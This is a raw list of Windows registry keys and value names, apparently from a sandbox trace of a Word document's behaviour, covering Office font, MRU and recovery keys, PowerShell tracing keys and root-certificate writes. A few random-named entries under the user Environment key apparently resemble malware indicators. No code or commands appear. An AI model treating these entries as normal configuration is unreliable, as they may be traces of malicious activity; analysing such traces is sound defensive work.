HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Euphemia
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
FangSong
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Felix Titling
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Footlight MT Light
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Forte
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Book
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Demi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Demi Cond
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Heavy
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Medium
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Medium Cond
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
FrankRuehl
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
FreesiaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Freestyle Script
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
French Script MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gabriola
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Garamond
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gautami
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Georgia
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gigi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans MT Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans MT Ext Condensed Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans Ultra Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans Ultra Bold Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gisha
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gloucester MT Extra Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Goudy Old Style
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Goudy Stout
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gulim
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
GulimChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gungsuh
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
GungsuhChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Haettenschweiler
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Harlow Solid Italic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Harrington
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
High Tower Text
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Impact
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Imprint MT Shadow
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Informal Roman
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
IrisUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Iskoola Pota
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
JasmineUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Jokerman
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Juice ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
KaiTi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kalinga
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kartika
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Khmer UI
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
KodchiangUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kokila
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kristen ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kunstler Script
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lao UI
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Latha
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Leelawadee
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Levenim MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
LilyUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Bright
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Calligraphy
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Console
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Fax
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Handwriting
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Sans
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Sans Typewriter
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Sans Unicode
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Magneto
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Maiandra GD
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Malgun Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Mangal
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Marlett
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Matura MT Script Capitals
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Meiryo
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Meiryo UI
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Himalaya
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft JhengHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft New Tai Lue
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft PhagsPa
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Sans Serif
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Tai Le
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Uighur
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft YaHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Yi Baiti
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU_HKSCS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU_HKSCS-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Miriam
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Miriam Fixed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Mistral
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Modern No. 20
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Mongolian Baiti
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Monotype Corsiva
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MoolBoran
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Mincho
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Outlook
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS PGothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS PMincho
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Reference Sans Serif
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Reference Specialty
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS UI Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MT Extra
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MV Boli
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Narkisim
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Niagara Engraved
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Niagara Solid
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
NSimSun
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Nyala
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
OCR A Extended
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Old English Text MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Onyx
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Palace Script MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Palatino Linotype
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Papyrus
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Parchment
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Perpetua
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Perpetua Titling MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Plantagenet Cherokee
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Playbill
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
PMingLiU
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
PMingLiU-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Poor Richard
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Pristina
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Raavi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rage Italic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Ravie
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rockwell
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rockwell Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rockwell Extra Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rod
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Sakkal Majalla
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Script MT Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe Print
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe Script
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI Light
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI Semibold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI Symbol
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Shonar Bangla
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Showcard Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Shruti
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
SimHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Simplified Arabic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Simplified Arabic Fixed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
SimSun
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
SimSun-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Snap ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Stencil
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Sylfaen
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Symbol
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tahoma
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tempus Sans ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Times New Roman
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Traditional Arabic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Trebuchet MS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tunga
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tw Cen MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tw Cen MT Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tw Cen MT Condensed Extra Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Utsaah
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vani
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Verdana
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vijaya
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Viner Hand ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vivaldi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vladimir Script
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vrinda
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Webdings
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wide Latin
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wingdings
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wingdings 2
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wingdings 3
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\DocumentRecovery\2FF36
2FF36
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Place MRU
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 1
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 2
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 3
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 4
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 5
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 6
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 7
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 8
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 9
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 10
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 11
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 12
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 13
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 14
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 15
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 16
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 17
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 18
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 19
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 20
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Place MRU
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 1
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 2
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 3
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 4
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 5
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 6
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 7
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 8
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 9
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 10
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 11
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 12
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 13
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 14
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 15
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 16
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 17
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 18
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 19
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 20
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Security\Trusted Documents
LastPurgeTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109E60090400100000000F01FEC\Usage
ProductNonBootFilesIntl_1033
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
WORDFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
VBAFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00100000000F01FEC\Usage
SpellingAndGrammarFiles_3082
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00100000000F01FEC\Usage
SpellingAndGrammarFiles_3082
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400100000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400100000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00100000000F01FEC\Usage
SpellingAndGrammarFiles_3082
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00100000000F01FEC\Usage
SpellingAndGrammarFiles_3082
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400100000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400100000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\DocumentRecovery\2FF36
2FF36
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\DocumentRecovery\2FF36
2FF36
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\DocumentRecovery\2FF36
2FF36
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109E60090400100000000F01FEC\Usage
ProductNonBootFilesIntl_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109E60090400100000000F01FEC\Usage
EquationEditorFilesIntl_1033
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109E60090400100000000F01FEC\Usage
EquationEditorFilesIntl_1033
HKEY_CURRENT_USER\Oversigtslisterne
Incharity
HKEY_CURRENT_USER\Environment
Chansonens
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\wab_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\wab_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\wab_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\wab_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\wab_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\wab_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\wab_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\wab_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\wab_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\wab_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\wab_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\wab_RASMANCS
FileDirectory
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8
Blob
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
